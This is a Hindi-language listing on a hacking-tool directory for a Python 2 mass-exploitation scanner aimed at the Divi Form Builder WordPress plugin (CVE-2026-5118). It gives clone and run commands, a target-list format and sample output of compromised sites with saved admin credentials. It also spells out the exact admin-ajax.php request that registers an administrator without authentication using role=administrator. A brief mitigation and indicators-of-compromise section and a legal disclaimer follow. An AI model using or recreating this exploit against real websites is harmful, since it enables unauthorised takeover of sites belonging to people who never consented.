Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5118 — CVE-2026-5118 – Divi WordPress प्लगइन के लिए Python2 बड़े पैमाने पर शोषण admin-ajax.php के माध्यम से बिना प्रमाणीकरण के व्यवस्थापक पंजीकरण। नॉन्स निष्कर्षण के साथ मल्टी-थ्रेडेड स्कैनर। | Kitploit
उपकरण/GitHubGitHub/jenderal92/cve-2026-5118
विशेषाधिकार वृद्धिभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubjenderal92/cve-2026-5118

CVE-2026-5118

CVE-2026-5118 – Divi WordPress प्लगइन के लिए Python2 बड़े पैमाने पर शोषण admin-ajax.php के माध्यम से बिना प्रमाणीकरण के व्यवस्थापक पंजीकरण। नॉन्स निष्कर्षण के साथ मल्टी-थ्रेडेड स्कैनर।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Divi Form Builder <= 5.1.2 - 'role' के माध्यम से बिना प्रमाणीकरण के विशेषाधिकार वृद्धि

⚠️ चेतावनी: यह उपकरण केवल अधिकृत पैठ परीक्षण और सुरक्षा अनुसंधान के लिए है।
कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है। केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति है। अधिक अस्वीकरण आप Jenderal92 के कवर पर देख सकते हैं। आप इसे यहाँ !!! देख सकते हैं

अवलोकन

यह Python 2 स्क्रिप्ट Divi WordPress प्लगइन (और संबंधित Divi फॉर्म) में एक विशेषाधिकार वृद्धि भेद्यता का शोषण करती है। यह दूरस्थ रूप से एक व्यवस्थापक खाता पंजीकृत करने की अनुमति देती है:

  • लक्ष्य के Divi पंजीकरण फॉर्म से fb_nonce निकालना।
  • role=administrator के साथ /wp-admin/admin-ajax.php पर एक तैयार किया गया मल्टीपार्ट अनुरोध भेजना।
  • स्वचालित रूप से सफलता का पता लगाना और समझौता किए गए व्यवस्थापक URL को सहेजना।

विशेषताएँ

  • ✅ मल्टी-थ्रेडेड (डिफ़ॉल्ट 20 थ्रेड) तेज़ स्कैनिंग के लिए।
  • ✅ स्वचालित URL सामान्यीकरण – यदि गायब है तो https:// जोड़ता है।
  • ✅ Nonce निष्कर्षण एकाधिक regex पैटर्न का उपयोग करके (इनलाइन JavaScript, छिपे हुए इनपुट, de_fb_obj)।
  • ✅ मल्टीपार्ट/form-data अनुरोध जो एक वैध ब्राउज़र सबमिशन का अनुकरण करता है।
  • ✅ सफलता का पता लगाना प्रतिक्रिया कीवर्ड के माध्यम से (success, user_id, user created, आदि)।
  • ✅ परिणाम सहेजे गए results.txt में इस प्रारूप में: https://target.com/wp-admin/ | username | password

आवश्यकताएँ

  • Python 2.7 (urllib2, Queue, threading का उपयोग करता है – संशोधनों के बिना Python 3 के साथ संगत नहीं है)
  • लक्ष्य URL की एक सूची (प्रति पंक्ति एक)

स्थापना

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py

उपयोग

1. लक्ष्य सूची तैयार करें

एक टेक्स्ट फ़ाइल बनाएं जिसमें प्रति पंक्ति एक डोमेन या URL हो। आप http:// / https:// छोड़ सकते हैं – स्क्रिप्ट डिफ़ॉल्ट रूप से https:// जोड़ देगी।

उदाहरण targets.txt:

root@kitploit:~
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org

2. एक्सप्लॉइट चलाएँ

root@kitploit:~
python CVE-2026-5118.py targets.txt

3. आउटपुट उदाहरण

root@kitploit:~
[*] Total targets : 4
[*] Credentials   : Attacker / Attacker@123#+
[*] Threads       : 20
[*] Output file   : results.txt

[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/

[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/

[3] Checking http://192.168.1.100/wordpress
[3] FAILED  http://192.168.1.100/wordpress

[4] Checking https://test-site.org
[4] FAILED  https://test-site.org

=== DONE ===
Successful: 2 / 4

4. परिणाम फ़ाइल (results.txt)

root@kitploit:~
https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+

कॉन्फ़िगरेशन

आप स्क्रिप्ट के शीर्ष पर निम्नलिखित वेरिएबल्स को अनुकूलित कर सकते हैं:

यह कैसे काम करता है

  1. URL सामान्यीकरण – यदि कोई स्कीम प्रदान नहीं की गई है तो https:// जोड़ता है।
  2. Nonce निकालें – होमपेज (या पंजीकरण पृष्ठ) लाता है और regex पैटर्न का उपयोग करके fb_nonce खोजता है।
  3. अनुरोध बनाएँ – एक multipart/form-data POST का निर्माण करता है जिसमें शामिल हैं:
    • action=de_fb_ajax_submit_ajax_handler
    • fb_nonce=<extracted nonce>
    • role=administrator
    • de_fb_user_login / user_login
    • de_fb_user_pass / user_pass
    • de_fb_user_email / user_email
  4. admin‑ajax.php पर भेजें – यदि प्रतिक्रिया में कोई सफलता कीवर्ड है, तो लक्ष्य को असुरक्षित के रूप में चिह्नित किया जाता है।

पहचान और शमन

Divi का उपयोग करने वाले WordPress व्यवस्थापकों के लिए:

  • Divi और सभी संबंधित प्लगइन्स को नवीनतम संस्करण में अपडेट करें।
  • यदि आवश्यक न हो तो सार्वजनिक पंजीकरण अक्षम करें।
  • admin-ajax.php अनुरोधों की निगरानी के लिए एक सुरक्षा प्लगइन (Wordfence, Sucuri) का उपयोग करें।
  • सभी पंजीकरण फॉर्म पर reCAPTCHA लागू करें।
  • कभी भी ऐसे पंजीकरण फॉर्म को उजागर न करें जिसमें role पैरामीटर हो जिसमें हेरफेर किया जा सके।

समझौते के संकेतक (IOCs):

  • action=de_fb_ajax_submit_ajax_handler के साथ अप्रत्याशित admin-ajax.php अनुरोध
  • संदिग्ध उपयोगकर्ता नामों (जैसे Attacker) के साथ नए व्यवस्थापक उपयोगकर्ता
  • एक्सेस लॉग में role=administrator वाला POST डेटा

कानूनी अस्वीकरण

यह सॉफ्टवेयर शैक्षिक उद्देश्यों और केवल अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। लेखक इस उपकरण के दुरुपयोग या इसके कारण होने वाली क्षति के लिए कोई देयता नहीं मानता है। इस सॉफ्टवेयर का उपयोग करके, आप सहमत हैं कि:

  • परीक्षण से पहले सिस्टम स्वामी से लिखित अनुमति प्राप्त करें।
  • सभी लागू कानूनों (CFAA, Computer Misuse Act, UU ITE, आदि) का अनुपालन करें।
  • प्राप्त किसी भी अनधिकृत पहुंच को तुरंत हटा दें।
  • प्रभावित विक्रेता को जिम्मेदारी से भेद्यताओं की रिपोर्ट करें।

इन शर्तों का उल्लंघन करने पर आपराधिक मुकदमा, जुर्माना या कारावास हो सकता है।

योगदान

सुधारों के लिए पुल अनुरोधों का स्वागत है (Python 3 पोर्ट, बेहतर nonce निष्कर्षण, अतिरिक्त पंजीकरण पथ का पता लगाना)। कृपया नैतिक अस्वीकरण बनाए रखें।

टूल डाउनलोड करें
वेरिएबलडिफ़ॉल्टविवरण
DEFAULT_USERNAMEAttackerपंजीकृत करने के लिए उपयोगकर्ता नाम
DEFAULT_PASSWORDAttacker@123#+पासवर्ड (विशेष वर्णों के साथ मजबूत)
DEFAULT_EMAIL[email protected]ईमेल पता
THREAD_COUNT20समवर्ती थ्रेड्स की संख्या
OUTPUT_FILEresults.txtसफल लक्ष्यों को सहेजने के लिए फ़ाइल
  • परिणाम सहेजें – व्यवस्थापक URL और क्रेडेंशियल्स को आउटपुट फ़ाइल में लिखता है।